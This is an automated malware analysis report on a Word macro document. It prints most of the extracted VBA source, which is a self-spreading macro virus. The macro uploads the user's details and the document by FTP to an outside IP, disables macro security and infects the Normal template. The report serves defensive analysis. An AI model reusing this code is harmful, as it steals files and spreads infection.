Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0fb8d91ba8044b64…

MALICIOUS

Office (OLE)

Size: 42.0 KB
Created: 2001-11-14 09:55:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 9617d3c59e86ab3d1af9e628dd981979
SHA-1: 7dd1bbd753d98539a58f88d74a166526cdf56719
SHA-256: 0fb8d91ba8044b64ca25f24fffc351e90b9cfb105b41c6e29f40724f18988ba6
Risk Score: 200

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a Microsoft Word document containing VBA macros. Heuristics indicate the presence of VBA macros and a critical finding of a Shell() call within the VBA code, suggesting arbitrary code execution. The ClamAV detection of 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1' further confirms its malicious nature. The VBA script attempts to create a log file at 'C:\Log' and appears to be part of a downloader or dropper mechanism.

Heuristics (3)

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4652 bytes
SHA-256: 29a64c18c3a23d6d5914a8126a72d1443309ee1fbdc7d558496eebb6be3f0919
Detection: ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Const EXELoc = "Template"
'Ver=2.02
Private Sub Document_Close()

On Error Resume Next

Const InfectedMark = "本产品为良性"
Const Ver = "2.01"

Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
Dim BegSlash, EndSlash, Loc As Long
Dim FileDosPath As String

Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)

DocumentInfected = ad.codemodule.Find(InfectedMark, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.codemodule.Find(InfectedMark, 1, 1, 10000, 10000)

If (EXELoc <> "Template") Or Not (DocumentInfected) Then
  LogData = Format(Time, "hh:mm:ss AMPM - ") & _
                     Format(Date, "dddd, d mmm yyyy") & _
              "' " & Application.UserName & _
              "' " & UserAddress & "' " & ThisDocument.Name
    
    For i = 1 To 4
        LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
    Next i
    LogFile = "C:\Log" & LogFile
   
    Open LogFile For Output As #1
    Print #1, LogData
    Close #1

    BegSlash = 1
    EndSlash = 1
    FileDosPath = ActiveDocument.Path + "\"
    Do While EndSlash > 0
       BegSlash = InStr(BegSlash, FileDosPath, "\")
       EndSlash = InStr(BegSlash + 1, FileDosPath, "\")
       FileDosPath = Mid(FileDosPath, 1, BegSlash) + """" + Mid(FileDosPath, BegSlash + 1, EndSlash - BegSlash - 1) + _
                 """" + Mid(FileDosPath, EndSlash)
       BegSlash = EndSlash + 2
    Loop

    Open "c:\Log" For Output As #1
    Print #1, "o 87.16.16.10"
    Print #1, "user centre centre"
    Print #1, "cd /usr/news"
    Print #1, "ascii"
    Print #1, "put " & LogFile
    Print #1, "binary"
    Print #1, "put " & FileDosPath & ActiveDocument.Name
    Print #1, "del " & LogFile
    Print #1, "del c:\Log "
    Print #1, "quit"
    Close #1
    
    Open "c:\DelBat.bat" For Output As #1
    Print #1, "call ftp.exe -n -s:c:\Log"
    Print #1, "del " & LogFile
    Print #1, "del c:\Log"
    Print #1, "del c:\DelBat.bat"
    Close #1
    Shell "command.com /c c:\DelBat.bat", vbHide
End If
If DocumentInfected Then
   If IsNumeric(Mid(ad.codemodule.Lines(2, 1), 6)) Then
      DocumentInfected = (Val(Mid(ad.codemodule.Lines(2, 1), 6)) >= Ver)
   Else
      DocumentInfected = False
   End If
End If

If NormalTemplateInfected Then
   If IsNumeric(Mid(nt.codemodule.Lines(2, 1), 6)) Then
      NormalTemplateInfected = (Val(Mid(nt.codemodule.Lines(2, 1), 6)) >= Ver)
   End If
End If
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
  CommandBars("Macro").Controls("Security...").Enabled = False
  System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
  CommandBars("Tools").Controls("Macro").Enabled = False
  CommandBars("工具").Controls("宏").Enabled = False
  Options.ConfirmConversions = False
  Options.VirusProtection = False
  Options.SaveNormalPrompt = False
  Options.SavePropertiesPrompt = False
End If

If (DocumentInfected = False Or NormalTemplateInfected = False) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
   
  If DocumentInfected = True Then
  
    SaveNormalTemplate = NormalTemplate.Saved
  
    OurCode = "const EXELoc=" + """" + "Template" + """" + Chr(13)
    OurCode = OurCode + ad.codemodule.Lines(2, ad.codemodule.CountOfLines - 1)

    nt.codemodule.DeleteLines 1, nt.codemodule.CountOfLines
    nt.codemodule.AddFromString OurCode
    
    If SaveNormalTemplate = True Then NormalTemplate.Save
  End If

  If NormalTe
... (truncated)